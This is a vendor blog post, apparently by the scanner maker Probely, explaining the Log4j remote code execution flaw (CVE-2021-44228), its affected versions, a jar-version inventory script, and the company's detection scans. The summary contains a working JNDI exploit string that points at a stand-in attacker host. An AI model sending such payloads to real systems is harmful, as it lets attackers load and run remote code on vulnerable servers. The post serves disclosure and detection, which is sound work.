
Log4j RCE Testing with Probely

A lot has already been covered in the interwebs regarding CVE-2021-44228 and the newer CVE-2021-45046. In case you’re just arriving from the Maldives and just heard about the log4j RCE, here’s a quick summary:

  • On Dec 9th, 2021, a critical vulnerability in Apache’s log4j package was disclosed and spread in the wild. Apache Log4j is a Java-based logging utility that is widely used in the Java world.
  • The affected versions are from 2.0-beta-9 to 2.14.1. The vulnerability was patched in 2.15.0 (CVE-2021-44228) and then patched again in version 2.16.0 (CVE-2021-45046).
  • This vulnerability can be easily exploited. All it takes is a vulnerable version of log4j, an endpoint on any protocol (HTTP, TCP, etc.) that allows an attacker to send the exploit string (e.g. ${jndi:ldap://attacker.com/a}), and a log statement that logs the string from that request.
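An inventory check built on the version ranges listed above, as an added example that is not Probely's code. It assumes the input is a list of `log4j-core` jar file names (the sample paths are constructed) and applies only the boundaries this post states, so back-ported fix releases on older branches and later advisories are not modelled.

```python
import re

# Matches names such as log4j-core-2.14.1.jar, log4j-core-2.0-beta9.jar or ...-beta-9.jar
JAR_RE = re.compile(
    r"log4j-core-(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)-?(\d+))?\.jar$",
    re.I)
STAGE = {"alpha": 0, "beta": 1, "rc": 2, None: 3}  # pre-releases sort before the release

def version_key(name):
    """Return a sortable tuple for a log4j-core jar name, or None if it is not one."""
    m = JAR_RE.search(name)
    if not m:
        return None
    major, minor, patch, stage, num = m.groups()
    return (int(major), int(minor), int(patch or 0),
            STAGE[stage.lower() if stage else None], int(num or 0))

# Boundaries taken from the version ranges stated in the post.
FIRST_AFFECTED = (2, 0, 0, STAGE["beta"], 9)   # 2.0-beta-9
LAST_AFFECTED = (2, 14, 1, STAGE[None], 0)     # 2.14.1
SECOND_FIX = (2, 16, 0, STAGE[None], 0)        # 2.16.0

def classify(name):
    """Map a jar path to a verdict based on the post's version ranges."""
    key = version_key(name)
    if key is None:
        return "not-log4j-core"
    if key < FIRST_AFFECTED:
        return "outside-affected-range"
    if key <= LAST_AFFECTED:
        return "affected-CVE-2021-44228"
    if key < SECOND_FIX:
        return "upgrade-to-2.16.0-for-CVE-2021-45046"
    return "at-or-above-2.16.0"

# Constructed sample inventory (e.g. the output of a file search on a build host).
SAMPLE = [
    "/opt/app/lib/log4j-core-2.14.1.jar",
    "/opt/app/lib/log4j-core-2.0-beta9.jar",
    "/opt/legacy/lib/log4j-core-2.0-beta8.jar",
    "/srv/api/WEB-INF/lib/log4j-core-2.15.0.jar",
    "/srv/api/WEB-INF/lib/log4j-core-2.16.0.jar",
    "/srv/api/WEB-INF/lib/log4j-api-2.14.1.jar",
]

if __name__ == "__main__":
    for path in SAMPLE:
        print(f"{classify(path):40} {path}")
```

File names alone miss log4j classes bundled inside fat or shaded jars, so treat a clean result as a lower bound.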

The following links are good information resources on how this vulnerability works and how it can be exploited:

Everybody needs a hacker

When this vulnerability was released in the wild, our first priority at Probely was to make sure that we didn’t have any vulnerable version of log4j running. In parallel, we started working on adding a test for this vulnerability to Probely.

Detecting log4j vulnerability with Probely

Probely now tests for vulnerable versions of log4j. It will send attack payloads in all relevant injection points, namely HTTP headers, GET parameters, and POST values. We use different attack payloads while testing, some of them to evade Web Application Firewalls (WAF).

The test for this vulnerability is included by default in all scanning profiles, except for lightning scans. In order to speed up testing on your side, we created a specific scanning profile, ‘log4shell’, that tests only for this vulnerability.

If you don’t have a Probely account yet, feel free to sign up and start a free 14-day trial. Happy Testing!

FAQ

Does Probely make me vulnerable to log4shell?

Probely is hosted in the cloud and is not running any vulnerable version of log4j.

The only component of Probely that can be hosted on your infrastructure is the farcaster agent, which allows you to scan internal targets. As you can see on our GitHub page, the agent is implemented in Go and therefore does not use log4j.

Is Probely capable of detecting the log4shell vulnerability?

Yes, Probely tests for the log4j vulnerability in all scanning profiles other than the lightning profile. It also includes a specific scanning profile that only tests this vulnerability.

Is Probely capable of detecting log4shell vulnerabilities in events that are not triggered during the scan?

No, if the event that will trigger the vulnerability only occurs after the scan is finished, then Probely will not be able to detect the vulnerability. This could be the case, for instance, if you had a daily cron job that would process your access logs and use log4j.

In most cases, the vulnerability is triggered immediately and Probely is able to detect it. Imagine that your application uses log4j for the application logs, and logs an action that includes the username, name, or any other user input.